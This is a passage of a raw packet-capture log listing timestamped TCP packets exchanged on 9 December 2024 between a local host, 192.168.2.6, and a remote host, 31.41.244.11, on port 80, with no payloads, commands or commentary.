                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.848397970 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.849487066 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.849534035 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.849771023 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.849819899 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.850769997 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.850810051 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.850961924 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.851008892 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.852134943 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.852176905 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.852272034 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.852314949 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.853440046 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.853487015 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.853549957 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.853593111 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.854588032 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.854633093 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.854698896 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.854743004 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.855870962 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.855921030 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.855967045 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.856007099 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.857004881 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.857068062 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.857144117 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.857187986 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.858241081 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.858279943 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.858284950 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.858330965 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.859589100 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.859600067 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.859633923 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.860694885 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.860759020 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.860784054 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.860827923 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.861891031 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.861938953 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.862195969 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.862238884 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.863106966 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.863152981 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.863173962 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.863224030 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.864542007 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.864584923 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.864650965 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.864694118 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.865509987 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.865554094 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.865576982 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.865586042 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.866710901 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.866751909 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.866818905 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.866867065 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.867908955 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.867948055 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.868045092 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.868086100 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.869287014 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.869330883 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.869498014 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.869544029 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.871037006 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.871082067 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.871164083 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.871206999 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.871882915 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.871926069 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.871992111 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.872045040 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.872845888 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.872889996 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.872934103 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.872981071 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.874043941 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.874092102 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.874114037 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.874150038 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.875188112 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.875232935 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.875308037 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.875353098 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.876518011 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.876584053 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.876656055 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.876701117 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.877629995 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.877675056 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.877959013 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.877995968 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.878865004 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.878911972 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.878978968 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.879018068 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.880047083 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.880094051 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.880148888 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.880193949 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.881269932 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.881320953 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.881395102 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.881438017 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.882494926 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.882527113 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.882535934 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.882561922 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.883704901 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.883752108 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.883774042 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.883812904 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.884980917 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.885029078 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.885094881 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.885138035 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.886080980 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.886131048 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.886188984 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.886233091 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.887331963 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.887377024 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.887444973 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.887482882 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.888520002 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.888561964 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.888642073 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.888683081 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.889746904 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.889786959 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.889949083 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.889995098 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.890980005 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.891026020 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.891048908 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.891092062 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.892313004 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.892354965 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.892522097 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.892565966 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.893425941 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.893476009 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.020788908 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.020881891 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.021430016 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.021476984 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.021501064 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.021513939 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.021542072 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.021562099 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.022346020 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.022368908 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.022391081 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.022398949 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.023355007 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.023399115 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.023880005 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.023922920 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.024426937 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.024470091 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.024565935 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.024609089 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.025504112 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.025546074 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.025619984 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.025660992 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.026664972 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.026715994 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.027271986 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.027316093 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.027654886 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.027698040 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.027765989 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.027807951 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.028897047 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.028939962 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.028980017 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.029022932 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.029815912 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.029859066 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.029930115 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.029972076 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.031008005 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.031022072 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.031054974 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.031070948 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.031982899 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.032031059 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.032073975 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.032114983 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.033128023 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.033173084 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.033206940 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.033251047 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.034254074 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.034297943 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.034317017 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.034353018 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.035232067 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.035274982 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.035295963 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.035330057 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.036356926 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.036402941 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.036767960 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.036820889 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.037400007 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.037444115 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.037508965 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.037549973 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.038490057 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.038532019 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.038582087 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.038624048 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.039614916 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.039655924 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.039700031 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.039745092 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.040757895 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.040811062 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.041131020 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.041192055 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.041759014 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.041801929 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.041965008 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.042006969 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.042857885 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.042901039 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.043009043 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.043050051 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.043950081 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.043997049 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.044122934 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.044166088 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.045000076 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.045042992 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.045059919 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.045101881 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.046082020 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.046125889 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.046410084 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.046452999 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.047250032 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.047291994 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.047370911 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.047414064 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.048471928 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.048513889 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.048536062 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.048572063 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.049413919 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.049458981 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.049555063 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.049597025 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.050453901 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.050496101 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.050515890 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.050559998 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.051491022 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.051532030 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.051547050 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.051585913 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.052647114 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.052690983 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.052741051 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.052783012 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.053679943 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.053719997 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.053761005 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.053801060 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.054795980 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.054837942 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:11.054965019 CET804985931.41.244.11192.168.2.6
